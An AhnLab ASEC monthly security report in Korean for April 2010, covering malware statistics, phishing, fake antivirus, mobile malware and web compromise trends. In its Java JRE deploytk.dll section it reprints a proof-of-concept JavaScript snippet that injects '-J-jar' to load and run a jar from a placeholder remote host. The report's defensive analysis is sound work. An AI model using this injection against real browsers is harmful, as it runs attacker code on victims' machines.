Similar documents
< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-

*2008년1월호진짜

Ⅰ. 이달의 보안 동향 1. 악성코드 동향 아래 표는 악성코드의 주요 동향을 파악하기 위하여, 악성코드별 변종을 종합한 악성코드 대표진단명 감염보고 Top20이다. 악성코드 통계 2010년 10월 악성코드 통계현황은 다음과 같다. [표 1-2] 악성코드 대표진단명 감염

Ⅰ. 이달의보안동향 1. 악성코드동향 2009년 10월 ASEC 리포트부터는기존의고객신고에기반한통계치의한계를넘어, 현상황을정확하게반영하고자, AhnLab에서독자개발한 AMP 1 을이용하여산출한통계데이터를사용하도록개선하였다. 아래표는악성코드의주요동향을파악하기위하여, 악성


` 동향보고서 1. 악성코드은닉동향요약 3 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 6 - 유포지탐지현황 6 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 8 - 악성코드유형별비율 9 - 위협 IP 및도메인현황 10

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다 년 6 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1

월간 CONTENTS 3 EXPERT COLUMN 영화 점퍼 와 트로이목마 4 SPECIAL REPORT 패치 관리의 한계와 AhnLab Patch Management 핵심은 패치 관리, 왜? 8 HOT ISSUE 2016년에 챙겨봐야 할 개인정보보호

월간악성코드은닉사이트탐지 동향보고서 4 월 침해사고대응단인터넷침해대응본부

월간악성코드은닉사이트탐지 동향보고서 9 월 침해대응단사이버침해대응본부

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드별변종을종합한감염보고순위를악성코드대표진 단명에따라정리한것이다. 이를통해악성코드의동향을파악할수있 다 년 1 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [

취약점분석보고서 [Photodex ProShow Producer v ] RedAlert Team 안상환

목 차 1. 개 요 배경 요약 정보 대상시스템 원리 공격 기법 및 기본 개념 Heap Spray Font 공 격..


메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2003) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2003 Exchange Server 2003 GFI MailEssentials 2010 fo

메일서버등록제(SPF) 인증기능적용안내서 (Exchange Windows 2000) OS Mail Server SPF 적용모듈 작성기준 Windows Server 2000 Exchange Server 2003 GFI MailEssentials 14 for

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

08_spam.hwp

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 악성코드유포지현황 3 - 유포지탐지현황 3 - 대량경유지가탐지된유포지 TOP 악성코드취약점및취약한 S/W 악용현황 5 - 악성코드유형별비율 6 - 위협 IP/ 도메인현황 7 2

#WI DNS DDoS 공격악성코드분석

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 2009 년 11 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 년 11월의악성코드감염보고는 Win32/Induc이 1위를차지하고

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights res

AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안철수연구

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 2009 년 12 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 년 12월의악성코드감염보고는 Win32/Induc과 TextIma

Windows 8에서 BioStar 1 설치하기

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

PowerPoint Template

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

Secure Programming Lecture1 : Introduction

DDoS 공격, 게임계정유출해커, 비트코인등가상화폐노린다 - 13 년 10 월부터 DDoS, 원격제어, 게임계정유출하더니최근암호화폐채굴 - 개요지난 13 년 10 월,Microsoft 社의인터넷익스플로러취약점 (CVE ) 을통해유포되는악성코드가 DDoS

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

I. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다 년 12 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1]

ASEC REPORT VOL.82 October, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서

Deok9_Exploit Technique

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

ActFax 4.31 Local Privilege Escalation Exploit

Install stm32cubemx and st-link utility

Security Trend ASEC Report VOL.56 August, 2014


목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

유포지탐지동향

Microsoft Word - src.doc

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

로거 자료실

2017 년악성코드은닉사이트탐지동향보고서 ( 상반기 ) 악성코드은닉사이트탐지 동향보고서 17 년상반기 1

고객 사례 | Enterprise Threat Protector | Akamai

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 A

[Brochure] KOR_TunA

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

ASEC REPORT VOL.79 July, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

1. 배경 업무 내용이나 개인정보가 담긴 청구서 등을 메일로 전달 시 중요한 정보가 유출되는 경우가 발생하고 있으며, 이에 따른 메일 암호화 솔루션을 도입하고 있으나 기존 ActiveX를 기반으로 한 플러그인 방식은 여러 가지 제약으로 인해 사용성이 저하되고, 고객 대

wtu05_ÃÖÁ¾

server name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3

게시판 스팸 실시간 차단 시스템

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

ASEC REPORT VOL

JDK이클립스

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

슬라이드 1

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

개인정보보호의 이해 및 안전한 관리 - 개인PC 및 스마트폰 개인정보보호-

AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안철수연구

Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights res

인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

..,. Job Flow,. PC,.., (Drag & Drop),.,. PC,, Windows PC Mac,.,.,. NAS(Network Attached Storage),,,., Amazon Web Services*.,, (redundancy), SSL.,. * A

<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074>

1. 자바프로그램기초 및개발환경 2 장 & 3 장. 자바개발도구 충남대학교 컴퓨터공학과

*****

<4D F736F F D2036BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

AhnLab Security Emergency response Center ASEC (AhnLab Security Emergency response Center) 는악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안철수연구


View Licenses and Services (customer)

ASEC Report

월간 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]


Security Trend ASEC REPORT VOL.68 August, 2015

아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다

슬라이드 1

Portal_9iAS.ppt [읽기 전용]

목차 Part Ⅰ 3 월의악성코드통계 악성코드통계... 3 (1) 감염악성코드 Top (2) 카테고리별악성코드유형... 4 (3) 카테고리별악성코드비율전월비교... 4 (4) 월별피해신고추이... 5 (5) 월별악성코드 DB 등록추이...

160322_ADOP 상품 소개서_1.0

<4D F736F F D2038BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

슬라이드 1

Secure Programming Lecture1 : Introduction

슬라이드 1

Transcription:

Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다. 2010 년 4 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 20 2010년 4월의악성코드감염보고는 TextImage/Autorun 이 1위를차지하고있으며, Win32/Induc과 JS/Agent가각각 2위와 3위를차지하였다. 신규로 Top 20에진입한악성코드는총 6건이다. 2010년 4월의감염보고건수는 Win-Trojan/Agent 가총 675,610건으로 Top20중 13.2% 의비율로 1위를차지하고있으며, Win-Trojan/Onlinegamehack이 571,698건으로 2위, Win-Trojan/Downloader 이 526,113 건으로 3위를차지하였다. 아래차트는고객으로부터감염이보고된악성코드유형별비율이다. [ 그림 1-1] 악성코드유형별감염보고비율 AhnLab Policy Center 4.0 세상에서가장안전한이름안철수연구소 01

2010년 4 월의감염보고건수는악성코드유형별로감염보고건수비율은트로잔 (TROJAN) 류가 46.4% 로가장많은비율을차지하고, 웜 (WORM) 이 13.7%, 바이러스 (VIRUS) 가 8.5% 의비율을각각차지하고있다. 아래표는 4 월에신규로접수된악성코드중고객으로부터감염이보고 된악성코드 Top20 이다. [ 그림 1-2] 악성코드유형별감염보고전월비교 악성코드유형별감염보고비율을전월과비교하면, 트로잔, 애드웨어 (ADWARE), 다운로더 (DOWNLOADER), 스파이웨어 (SPYWARE) 가전월에비해증가세를보이고있는반면웜, 바이러스, 스크립트 (SCRIPT), 드롭퍼 (DROPPER) 는전월에비해감소한것을볼수있다. 애프케어 (AP- PCARE) 계열들은전월수준을유지하였다. [ 표 1-3] 신종악성코드감염보고 Top 20 4 월의신종악성코드감염보고의 Top 20 은 Win-Trojan/Downloader. 1134080 가 44,518 건으로전체 9.7% 를차지하여 1 위를차지하였으며, Win-Trojan/Bho. 923136 가 36,673 건 2 위를차지하였다. [ 그림 1-3] 악성코드월별감염보고건수 4 월의악성코드월별감염보고건수는 10,300,965 건으로 3 월의악성코 드월별감염보고건수 7,578,804 건에비해 2,722,161 건이증가하였다. [ 그림 1-4] 신종악성코드유형별분포 4 월의신종악성코드유형별분포는트로잔이 74% 로 1 위를차지하였다. 그뒤를이어애드웨어가 8%, 드롭퍼가 6% 를각각차지하였다. 악성코드이슈 남아공월드컵을이용한악의적인 PDF 문서 AhnLab V3 MSS 어도비아크로벳리더의잘못된 TIFF 이미지파싱관련취약점을이용한 악성코드유포사례가국외에서발견, 보고되었다. 여기에사용된주제 02 ASEC Report _ 2010. Vol.04

는 2010 남아공월드컵관련내용으로위장되어있었다. 악의적인 PDF 는기존에알려진 CVE-2010-0188 취약점을가지고있었다. 메일로전송되었던해당악성코드는취약한어도비아크로벳리더에서읽혀진경우 TIFF 파일에대한잘못된파싱과이를통하여쉘코드가실행되며, 이후특정폴더에악성코드파일을생성하고정보의유출을시도할것으로보인다. 최근에연이은 PDF 보안문제가불거지고있는만큼해당응용프로그램사용자는반드시보안업데이트를하기바란다. [ 그림 1-6] V3 Mobile 을이용한 WinCE/TredDial.a 진단 / 치료화면 [ 그림 1-5] 취약점이있는 PDF 문서실행과정 Windows Mobile 계열에서동작하는악성코드국내발견주의보국내에서윈도우모바일계열 (5.0, 6.1, 6.5버전 ) 에서동작하는스마트폰악성코드인 WinCE/TredDial.a ( 일명 3D Antiterrorist) 가발견, 보고되었다. 해당악성코드는게임어플리케이션에포함되어발견되었다. 해당악성코드의실행후증상은임의로특정전화번호의국제전화를무단으로발신하도록되어있었다. 이경우사용자에게원치않는통신비가과금되는상황이발생된다. 이용된게임명은 3D Antiterrorist 이며다음과같은 antiterrorist3d.cab 파일명을가지고있다. 실행시에는 Program Files 폴더에 reg.exe가설치되며, 시스템폴더에 smart32.exe 라는이름으로해당파일을복사한다. 또한해외 Premium-rate number 에국제전화를시도하여국제전화과금을발생시킨다. 최근들어스마트폰사용자가많아지고다양한스마트폰 OS 가선을보이고있다. 스마트폰응용프로그램도 PC 응용프로그램과마찬가지로하나의응용프로그램이다. 그러므로많은사용자가사용한프로그램이거나공식적인경로를통해서구입및설치한신뢰할수있는프로그램인지를다운로드및설치전에확인할필요가있다. Blackhat SEO 기법위협의증가안철수연구소를비롯한유명안티바이러스업체에서는올한해이슈가커질보안위협으로블랙햇 SEO(Blackhat Search Engine Optimization) 기법을이용한악성코드유포나온라인사기에대하여언급하였다. 해당기법은검색순위가높은단어나혹은특정주제에대하여사용자가검색사이트를통하여검색을하여접속한다는사실로부터시작된다. 사이버범죄자들은악성코드유포지나온라인사기를벌일수있는웹사이트를만들어놓고검색사이트에서사용자가히트율이높은단어나주제에대하여검색했을때자신이제작해둔사이트를상위로노출시키도록하는것이다. 이들은대부분악성코드를유포하도록하거나온라인신용카드사기를발생시키고있다. 주로국외에서자주보고되었고이전볼륨 (Volume) 에도언급한것처럼국내유명피겨선수의동영상을가장한웹사이트들이 Blackhat SEO 기법을통하여알려진사례가있었다. 4월에는타안티바이러스업체의오진정보를가장한웹사이트가발견, 보고되기도하였다. 사용자들은공식적이거나신뢰할만한웹사이트에서정보를얻는것이좋으며일부안티바이러스업체에서제공하는평판기반또는사이트분석기반의보안제품의기능을이용하여안전한웹서핑을하는것도도움이된다. 스팸메일을통한악성코드유포 최근아래와같이이메일계정의도메인이름을제목으로하여클릭을유 도하는스팸메일이유포되고있다. AhnLab Patch Manager 제목 : * 도메인 * account notification 세상에서가장안전한이름안철수연구소 03

Dear Customer, This e-mail was send by * 도메인 * to notify you that we have temporanly prevented access to your account. We have reasons to believe that your account may have been accessed by someone else. Please run attached file and Follow instructions (C) * 도메인 * 제목은예를들어사용하는이메일계정이 id@ahnlab.com 이라면메일제목은 ahnlab.com account notification 으로스팸메일이들어오게됩니다. 해당메일에는첨부파일이포함되어있거나혹은 URL 링크가포함되어있다. 이러한메일에첨부된파일이나 URL 링크를통해받는파일은악성코드이므로실행하지않도록주의해야한다. 끊임없는가짜백신가짜백신으로인한사용자피해가끊이질않고있다. 과거가짜백신은 ActiveX 컨트롤을통해불특정다수의사이트에서배포되었는데, 여러보안업체및관련기관의노력으로인해그수가많이줄어들었다. 하지만최근가짜백신은보안취약점, 다른애드웨어의번들또는업데이트프로그램을사용, 웹하드와같은인터넷서비스의제휴프로그램으로설치하는사례가부쩍늘어나고있다. 이렇게설치된가짜백신의경우사용자컴퓨터를정상적으로사용할수없도록파일의실행을차단하거나, 바탕화면을변경시켜사용자의불안감을조성하고허위또는과장된진단결과를지속적으로노출시켜사용자의유료결제를유도한다. ActiveX를통해전파되는악성코드최근국내포털업체의 BGM Player와 CafeOn으로위장하여키보드의입력값을훔치는키로거 (Keylogger) 를설치하는악성 ActiveX가발견되었다. 이번에발견된악성코드의특징은기존악성코드들과는다르게파일에대한디지털서명까지포함되어있었다는점이다. 신뢰되지않은사이트에서 ActiveX 설치를요구한다면주의를해야한다. [ 그림 1-8] 사용자동의없이설치된가짜백신 [ 그림 1-7] 악성코드파일의디지털서명보안제품을공격하는악성코드최근발견된온라인게임의계정을탈취하는스파이웨어인스파이웨어피더블유에스온라인게임 (Win-Spyware/PWS.OnlineGame) 의경우특정보안제품관련모듈을변조시켜정상작동을방해하는기능을가지고있다. 따라서해당스파이웨어감염되었을경우해당보안제품의특정기능이정상적으로동작하지못하는경우가발생하고있다. 이는과거자신을진단하고치료하는보안제품을우회하는기법이변화된것으로해당스파이웨어이외다른보안위협에도지속적으로노출될수있는문제점을야기한다. 이러한스파이웨어는주로인터넷웹브라우저보안취약점이나운영체제의보안취약점을통해감염되므로사용자는수시로보안패치를수행해외부의공격을예방하는것이좋다. 또한의심스러운이메일이나링크를클릭하지않는습관도중요하다. 이러한가짜백신은위와같은배포및설치방법으로인해사용자가직접설치한기억이없는제품이대부분이다. 이러한가짜백신은지속적으로허위또는과장된진단결과를보여줌으로사용자의불안감을조성하며정상적인서비스센터를운영하지않는다. 그리고대부분자동결제연장서비스로인해매달일정금액이자동으로결제되는문제를가지고있다. 따라서이러한피해를막기위해서는새로운프로그램을설치하거나서비스를사용할경우무조건 예 를눌러진행하지말고추가로설치되는프로그램이있는지잘살펴보아야하며해당프로그램이나서비스가나에게정말필요한것인가를다시한번살펴보고진행하는것이중요하다. AhnLab Trusguard 04 ASEC Report _ 2010. Vol.04

2. 시큐리티동향 악성코드침해웹사이트현황 시큐리티통계 4 월마이크로소프트보안업데이트현황 마이크로소프트사로부터발표된 4 월보안업데이트는 11 건이다. [ 그림 1-10] 악성코드배포를위해침해된사이트 / 배포지수 [ 그림 1-9] 공격대상기준별 MS 보안업데이트 [ 그림 1-10] 는월별악성코드침해사이트현황을나타낸그래프로, 2010년 1월부터침해사이트와유포사이트가꾸준하게증가하고있는데, 그원인을살펴보면 2010년 4월한달동안침해사이트를통해서유포되었던악성코드의대부분은 Win -Trojan/Daonol 의변종들이었고, 침해사고가발생한사이트에삽입되었던악성스크립트 URL이수시로변경되는특징이있었다. 또한메인도메인과여러하위도메인으로서비스되고있는사이트의경우메인도메인에침해사고가발생하면하위도메인에까지영향을주는것도하나의원인이라고할수있다. [ 표 1-4] 2010 년 4 월주요 MS 보안업데이트 이번달에는지난달에발표된 2건보다훨씬많은 11건의패치가발표되었다. 특히 MS10-022은지난달 PoC로발표되었고, 인터넷익스플로러상에서 VBScript를통한 Windows Help 파일실행과정에서발생하는실행가능한코드취약점이다. 사용자가 F1 키를클릭하게되면, 악의적으로조작된공격자의파일이 winhlp 32.exe를통해서실행되면서임의의명령을수행할수있게된다. 악의적인공격파일의경로는로컬파일시스템, SMB 또는 WedDav를사용할수있다. 또한, help 파일에전달되는파라미터의길이가지나치게긴경우, 버퍼오버플로우취약점으로발생하여인터넷익스플로러의크래쉬 (Crash) 가발생하는취약점도존재하여사용자의주의가필요하다. [ 그림 1-11] 침해사고사이트구조 [ 그림 1-12] 악성코드배포를위해사용된취약점 세상에서가장안전한이름안철수연구소 05

[ 그림 1-12] 은월별침해사고가발생한웹사이트들에서악성코드를유포하기위해서사용했던취약점들에대한통계로, MS06-014취약점을사용한악성코드유포가가장많이탐지되었고그다음으로 MS10-002취약점을사용한사례가많았다. 시큐리티이슈 Java JRE deploytk.dll ActiveX Control Multiple BOF 취약점이번볼륨 (Volume) 에서는 Java JRE에서발생하는 BOF취약점에대해알아보자. Oracle Java Web Start은 Java 2 Runtime Environment (JRE) 의컴포넌트이다. Web Start 어플리케이션에관한정보는 Java Network Launching Protocol(JNLP) 파일내에저장되며, 디폴트로 Javaws Utility 와함께실행된다. Web Start 어플리케이션과연관된두함수는아래와같다. launch - Launches JNLP application using the plugin if available. launchwebstartapplication(jnlp) - Launches the JNLP application specified by the jnlp file parameter. [ 그림 1-15] Web Start 어플리케이션과연관된두함수 아래는 Internet Explorer 에서해당취약점을이용하는 PoC 의일부분을 발췌한내용이다. var u = http: -J-jar -J\\\\xxx.xxxxxxxxx.com\\xxxx.jar none ; if (window.navigator.appname == Microsoft Internet Explorer ) { var o = document.createelement( OBJECT ); o.classid = clsid:cafeefac-dec7-0000-0000-abcdeffedcba ; o.launch(u); [ 그림 1-16] 해당취약점을이용하는 POC Oracle Java Web Start내에는 command line Injection 취약점이존재한다. 이취약점은 Java Web Start 시작할때 Java Plugin 과 Java Deployment Toolkit 에의해 JNLP 네트워크경로의적절한입력을검증하지못한것이원인이된다. 구체적으로말해서 Web Start 어플리케이 [ 그림 1-13] Javaws Utility의 command line 파라미터 <jnlp-file> 파라미터에는 URL이존재하고, 이중 -J<option> 은 Javaws가 Virtual Machine에옵션을제공하는것을허용해준다. Virtual Machine에제공된옵션들중 -jar 옵션은 Virtual Machine이 Java 어플리케이션의위치로서명시된 Java Archive file(jar) 을이용할수있게지시한다. Oracle Java Web Start는사용자가 JNLP 파일의 URL을이용하여그들의어플리케이션을설치하고시작할수있도록 Java 개발자에게방법을제공해준다. Oracle은개발자들이 Client Machine에서이작업을수행할수있게 Java Plugin 과 Java Deployment Toolkit 이라불리는 NPAPI와 ActiveX기술을공개하였다. 이기술을제공하는라이브러리로는 jp2iexp.dll, npjp2.dll, npdeploytk.dll, deploytk. dll이있다. Class ID Java Technology --------------------------------------------------------------------------------------------- CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBADeployment Kit Control 8AD9C840-044E-11D1-B3E9-00805F499D93 Java Plugin Control [ 그림 1-14] Start 어플리케이션시작을위해이용되는 ActiveX object(ie) 션을시작하기위해 Java Plugin 과 Java Deployment Toolkit 을이용할때, URL 경로가올바른네트워크리소스를가리키는지표면적으로만확인한다. 일단입력으로올바른 URL이라면 Javaws Commandline Utility를실행한다. URL내에 -J 문자가명시되어있으면, Web Start deployment technology은부정확한 command line 파라미터를 Javaws Utility로전달한다. 아래는 version 6.0.180.7의 deploytk.dll 파일내취약한일부분이다. 1000B8AF 8D45 E4 LEA EAX,DWORD PTR SS:[EBP-1C] 1000B8B2 50 PUSH EAX 1000B8B3 8D45 A0 LEA EAX,DWORD PTR SS:[EBP-60] 1000B8B6 50 PUSH EAX 1000B8B7 53 PUSH EBX 1000B8B8 53 PUSH EBX 1000B8B9 53 PUSH EBX 1000B8BA 53 PUSH EBX 1000B8BB 53 PUSH EBX 1000B8BC 53 PUSH EBX 1000B8BD 56 PUSH ESI 1000B8BE 8D85 9CFEFFFF LEA EAX,DWORD PTR SS:[EBP-164] 1000B8C4 50 PUSH EAX 1000B8C5 C745 A0 4400000>MOV DWORD PTR SS:[EBP-60],44 1000B8CC FF15 58210210 CALL DWORD PTR DS:[<&KERNEL32. CreateProc>;kernel32.CreateProcessA [ 그림 1-17] deploytk.dll 파일내취약한부분 06 ASEC Report _ 2010. Vol.04

아래는 Kernel32. CreateProcessA 를호출할당시해당인자값의내용이다. ModuleFileName = C:\Program Files\Java\jre6\bin\javaws.exe CommandLine = C:\Program Files\Java\jre6\bin\javaws.exe http: -J-jar -J\\xxx.xxxxxxxxx.com\xxxx.jar none pprocesssecurity = NULL pthreadsecurity = NULL InheritHandles = FALSE CreationFlags = 0 penvironment = NULL CurrentDir = NULL pstartupinfo = 01E6F4FC [ 그림 1-18] Kernel32.CreateProcessA 를호출할당시해당인자값 3. 웹보안동향 웹보안통계웹사이트보안요약 [ 표 1-5] 웹사이트보안요약 악성코드발견건수는 111,045건이고, 악성코드유형은 926건이며, 악성코드가발견된도메인은 1,028건이며, 악성코드발견된 URL은 3,898 건이다. 2010년 4월은 2010년 3월보다악성코드발견 deploytk.dll에서 Kernel32. CreateProcessA 함수를호출할때인자로 C:\Prog ram Files\Java\jre6\bin\javaws.exe http: -Jjar -J \\xxxx. xxxxxxxx.com \xxxx.jar none 값이들어가면서취약점을이용한악성코드가실행된다. 건수, 악성코드유형, 악성코드발견된 URL 은다소감소하였으나, 악성 코드가발견된도메인은증가하였다. 월별악성코드발견건수 Javaws -J 파라미터를 Virtual Machine 파라미터 -jar 와함께연결하여사용하면, 공격자는제한된 Java Security Sandbox 벗어나, 임의의 Java Code를로그인한사용자권한으로실행할수있다. 원격공격자는악의적인 HTML Document를만들어일반사용자가열수있도록유혹하여이취약점을이용할수있다. 침해사이트 Case Study: 백신제품을공격하는 Win-Trojan/Online gamehack. 100931 국내게임사이트에침해사고가발생하여 Win-Trojan/Onlinegamehack. 100931가유포중인것을탐지하였는데최종적으로다운로드되는 m.exe가실행되면 %SYSTEM%\softqq[ 랜덤숫자 ]dll이생성된다. 생성된 DLL은다수보안제품의파일을손상시켜서동작을불가능하게만드는 AVKiller 이다. [ 그림 1-20] 월별악성코드발견건수 2010년 4월악성코드발견건수는전달의 202,910건에비해 55% 수준인 111,045건이다. 월별악성코드유형 [ 그림 1-19] Win-Trojan/Onlinegamehack.1009 의유포단계 그리고 DLL 은특정사이트로부터게임핵악성코드를다운로드하고실행 한다. 따라서이러한악성코드는직접적으로보안제품을공격하여기능 을무능화시키므로각별한주의가필요하다. [ 그림 1-21] 월별악성코드유형 2010 년 4 월악성코드유형은전달의 1,046 건에비해 89% 수준인 926 건이다. 세상에서가장안전한이름안철수연구소 07

월별악성코드가발견된도메인 [ 그림 1-22] 월별악성코드가발견된도메인 2010 년 4 월악성코드가발견된도메인은전달의 959 건에비해 107% 수준인 1,028 건이다. [ 그림 1-24] 악성코드유형별배포수악성코드유형별배포수에서애드웨어 (ADWARE) 류가 67,689건전체의 61% 로 1위를차지하였으며, 트로잔 (TROJAN) 류가 11,534건으로전체의 10.4% 로 2위를차지하였다. 월별악성코드가발견된 URL 악성코드배포 Top 10 [ 그림 1-23] 월별악성코드가발견된 URL 2010 년 4 월악성코드가발견된 URL 은전달의 4,594 건에비해 85% 수 준인 3,023 건이다. 악성코드유형별배포수 [ 표 1-7] 악성코드배포 Top 10 악성코드배포 Top10 에서 Win-Adware/Shortcut.InlivePlayerActiveX.234이 26,859건으로 1위를차지하였으며, Top10에 Win-Adware/ Juneip. 645632등 7건이새로등장하였다. 웹보안이슈 facebook 패스워드리셋한다는스팸메일 [ 표 1-6] 악성코드유형별배포수 대다수의사람들이인터넷을통해정보를수집, 소비하는정보지식사회가되어가면서, 인터넷상에서인맥을연결하는사이트가급속히인기를끌고있다. 인기를끄는이유는인터넷상에서의무분별한정보들중에서자신과비슷한성향과직종을가진사람들끼리묶어주어정말필요한정보들만을공유할수있기때문이며, 자연스럽게많은사람들과대면없이편하게인맥을연결할수있기때문이다. 이러한사이트를 Social Networking Site라고한다. 이러한사이트들이인기를끌면서, 한편으로는악의적인행위를위해악용하는경우가발생하는데, 최근에는 SNS 중에서가장유명한페이스북 (facebook) 의계정을해킹하여판매한다는소식이있었다. 해당내용은러시아해커가 150만개에달하는페이스북 08 ASEC Report _ 2010. Vol.04

